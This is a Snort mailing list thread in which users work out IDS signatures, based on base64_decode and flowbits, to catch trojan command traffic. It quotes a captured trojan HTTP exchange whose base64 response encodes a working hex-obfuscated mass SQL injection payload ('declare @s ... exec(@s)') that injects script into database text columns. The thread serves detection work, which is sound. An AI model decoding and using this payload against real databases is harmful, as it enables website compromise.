Snort mailing list archives

Re: base64 snort options

From: Joel Esler <jesler () sourcefire com>
Date: Mon, 11 Jun 2012 08:32:00 -0400

<have not looked at pcap>

You have to use both sigs I gave you below.


On Jun 10, 2012, at 11:53 PM, whliudunjun wrote:


Hi,Joel Esler,
Thanks for your quickly reply,here i will post my pcap :f43b7121dadb17ff057bfdbba9b0c18f.pcap and the snort -T output 
if that you can know what's my trouble,i still cant use any sig detected the said traffic,when i use:
----------------------------------------------------------------------------------------------------------------------------------------------------------
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $EXTERNAL_NET $HTTP_PORTS (msg:"base64 returned from outbound post"; 
flow:to_client,established; flowbits:isset,badpost; content:"200"; http_stat_code; content:"text/html"; http_header; 
base64_decode:relative; base64_data;  content:"webmail.vigilante.dk"; sid:10000043;rev:1;).
----------------------------------------------------------------------------------------------------------------------------------------------------------
snort -A fast -b -d -r f43b7121dadb17ff057bfdbba9b0c18f.pcap  -c /opt/snort/etc/test.conf
 
nothing alert log.
 
Thanks.

At 2012-06-09 03:44:38,"Joel Esler" <jesler () sourcefire com> wrote:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Suspicious outbound post"; flow:to_server,established; 
content:"POST"; http_method; content:"index.php"; http_uri; flowbits:set,badpost; flowbits:noalert; sid:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $EXTERNAL_NET $HTTP_PORTS (msg:"base64 returned from outbound post"; 
flow:to_client,established; flowbits:isset,badpost; content:"200"; http_stat_code; content:"text/html"; 
base64_decode:relative; base64_data;  content:"webmail.vigilante.dk"; sid:2;)

or

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $EXTERNAL_NET $HTTP_PORTS (msg:"base64 returned from outbound post"; 
flow:to_client,established; flowbits:isset,badpost; content:"200"; http_stat_code; content:"text/html"; 
base64_decode:relative; base64_data;  content:"varchar("; content:"cast("; distance:0; sid:3;)

Actually the below won't work, the above should.


On Jun 8, 2012, at 3:43 PM, Joel Esler wrote:

Maybe something like this:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Suspicious outbound post"; flow:to_server,established; 
content:"POST"; http_method; content:"index.php"; http_uri; flowbits:set,badpost; flowbits:noalert; sid:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $EXTERNAL_NET $HTTP_PORTS (msg:"base64 returned from outbound post"; 
flow:to_client,established; flowbits:isset,badpost; content:"200"; http_stat_code; content:"text/html"; 
http_header; base64_decode:relative; base64_data;  content:"webmail.vigilante.dk"; sid:2;)

or

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $EXTERNAL_NET $HTTP_PORTS (msg:"base64 returned from outbound post"; 
flow:to_client,established; flowbits:isset,badpost; content:"200"; http_stat_code; content:"text/html"; 
http_header; base64_decode:relative; base64_data;  content:"varchar("; content:"cast("; distance:0; sid:3;)




Note, I wrote those off the top of my head.  I didn't test them as I don't have a pcap of the traffic.

--
Joel Esler
Senior Research Engineer, VRT
OpenSource Community Manager
Sourcefire


On Jun 8, 2012, at 2:05 AM, whliudunjun wrote:

when i use snort to scan pcap package,the net traffic like following:

the traffic:---------------------------------------------------------------------------------------
send:
POST /metcon/index.php?id=73EEFFDBC2080030429BE52FA2866576 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Axo 9.104.044 )
Host: 178.157.202.31
Content-Length: 4
Cache-Control: no-cache
INIT
receive:
HTTP/1.1 200 OK
Date: Wed, 06 Jun 2012 09:58:00 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2196
Content-Type: text/html
d2VibWFpbC52aWdpbGFudGUuZGs=#ODA=#MDAwMA==#L2luZGV4LnBocD9pZD0xJnR5cGU9YWxsJTI3ZGVjbGFyZSUyMEBzJTIwdmFyY2hhcig0MDAwKTtzZXQlMjBAcz1jYXN0KDB4NjQ2NTYzNkM2MTcyNjUyMDQwNzQyMDc2NjE3MjYzNjg2MTcyMjgzMjM1MzUyOTJDNDA2MzIwNzY2MTcyNjM2ODYxNzIyODMyMzUzNTI5MjA2NDY1NjM2QzYxNzI2NTIwNzQ2MTYyNkM2NTVGNjM3NTcyNzM2RjcyMjA2Mzc1NzI3MzZGNzIyMDY2NkY3MjIwNzM2NTZDNjU2Mzc0MjA2MTJFNkU2MTZENjUyQzYyMkU2RTYxNkQ2NTIwNjY3MjZGNkQyMDczNzk3MzZGNjI2QTY1NjM3NDczMjA2MTJDNzM3OTczNjM2RjZDNzU2RDZFNzMyMDYyMjA3NzY4NjU3MjY1MjA2MTJFNjk2NDNENjIyRTY5NjQyMDYxNkU2NDIwNjEyRTc4NzQ3OTcwNjUzRDI3NzUyNzIwNjE2RTY0MjAyODYyMkU3ODc0Nzk3MDY1M0QzOTM5MjA2RjcyMjA2MjJFNzg3NDc5NzA2NTNEMzMzNTIwNkY3MjIwNjIyRTc4NzQ3OTcwNjUzRDMyMzMzMTIwNkY3MjIwNjIyRTc4NzQ3OTcwNjUzRDMxMzYzNzI5MjA2RjcwNjU2RTIwNzQ2MTYyNkM2NTVGNjM3NTcyNzM2RjcyMjA2NjY1NzQ2MzY4MjA2RTY1Nzg3NDIwNjY3MjZGNkQyMDc0NjE2MjZDNjU1RjYzNzU3MjczNkY3MjIwNjk2RTc0NkYyMDQwNzQyQzQwNjMyMDc3Njg2OTZDNjUyODQwNDA2NjY1NzQ2MzY4NUY3Mzc0NjE3NDc1NzMzRDMwMjkyMDYyNjU2NzY5NkUyMDY1Nzg2NTYzMjgyNzc1NzA2NDYxNzQ2NTIwNUIyNzJCNDA3NDJCMjc1RDIwNzM2NTc0MjA1QjI3MkI0MDYzMkIyNzVEM0Q3Mjc0NzI2OTZEMjg2MzZGNkU3NjY1NzI3NDI4NzY2MTcyNjM2ODYxNzIyODM0MzAzMDMwMjkyQzVCMjcyQjQwNjMyQjI3NUQyOTI5MkI2MzYxNzM3NDI4MzA3ODMzNjMzNjM5MzYzNjM3MzIzNjMxMzY2NDM2MzUzMjMwMzczMzM3MzIzNjMzMzM2NDMyMzIzNjM4MzczNDM3MzQzNzMwMzM2MTMyNjYzMjY2MzY2NTM2MzEzNjM0MzY2MTM2NjMzNzMwMzY2NjM2MzkzNzMxMzczNzM2MzUzNjM0MzI2NTM3MzUzNjMxMzI2NjM2NjEzNzMzMzI2NTM3MzAzNjM4MzczMDMzNjYzNzMzMzYzOTM2MzQzMzY0MzMzMjMyMzIzMjMwMzczNzM2MzkzNjM0MzczNDM2MzgzMzY0MzIzMjMzMzAzMjMyMzIzMDM2MzgzNjM1MzYzOTM2MzczNjM4MzczNDMzNjQzMjMyMzMzMDMyMzIzMjMwMzczMzM3MzQzNzM5MzY2MzM2MzUzMzY0MzIzMjM2MzQzNjM5MzczMzM3MzAzNjYzMzYzMTM3MzkzMzYxMzY2NTM2NjYzNjY1MzYzNTMyMzIzMzY1MzM2MzMyNjYzNjM5MzYzNjM3MzIzNjMxMzY2NDM2MzUzMzY1MjA2MTczMjA3NjYxNzI2MzY4NjE3MjI4MzEzMDM2MjkyOTI3MjkyMDY2NjU3NDYzNjgyMDZFNjU3ODc0MjA2NjcyNkY2RDIwNzQ2MTYyNkM2NTVGNjM3NTcyNzM2RjcyMjA2OTZFNzQ2RjIwNDA3NDJDNDA2MzIwNjU2RTY0MjA2MzZDNkY3MzY1MjA3NDYxNjI2QzY1NUY2Mzc1NzI3MzZGNzIyMDY0NjU2MTZDNkM2RjYzNjE3NDY1MjA3NDYxNjI2QzY1NUY2Mzc1NzI3MzZGNzIyMCUyMGFzJTIwdmFyY2hhcig0MDAwKSk7ZXhlYyhAcyk7LS0=#X19fXw==#TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNS4xKSBBcHBsZVdlYktpdC81MzUuMTkgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTguMC4xMDI1LjE2MiBTYWZhcmkvNTM1LjE5##fDgxMw==#

end-------------------------------------------------------------------------------------------------------------------------------------------------------

base64:
d2VibWFpbC52aWdpbGFudGUuZGs=#
ascii:webmail.vigilante.dk

the receive data is encode using base64,so i write a snort rules to detected it:
41 alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Trojan SQL injection code receive"; 
flow:to_client,established;content:"HTTP/1.1 200 OK";content:"webmail.vigilante.dk";clas    
stype:trojan-activity; sid:10000043; rev:1;)

why this sig can't detect above traffic,is there anyone can tell me why?or i write rules at a wrong way,or i need 
to open some config option.





------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!




<pcap.zip>



------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!

Current thread:

base64 snort options whliudunjun (Jun 07)
- Re: base64 snort options praveen_recker . (Jun 08)
- Re: base64 snort options Joel Esler (Jun 08)
  - Re: base64 snort options Joel Esler (Jun 08)
    - Re: base64 snort options whliudunjun (Jun 11)
    - Re: base64 snort options Joel Esler (Jun 11)
    - Re: base64 snort options whliudunjun (Jun 11)
    - Re: base64 snort options whliudunjun (Jun 11)
    - Re: base64 snort options Bhagya Bantwal (Jun 13)
    - Re: base64 snort options whliudunjun (Jun 13)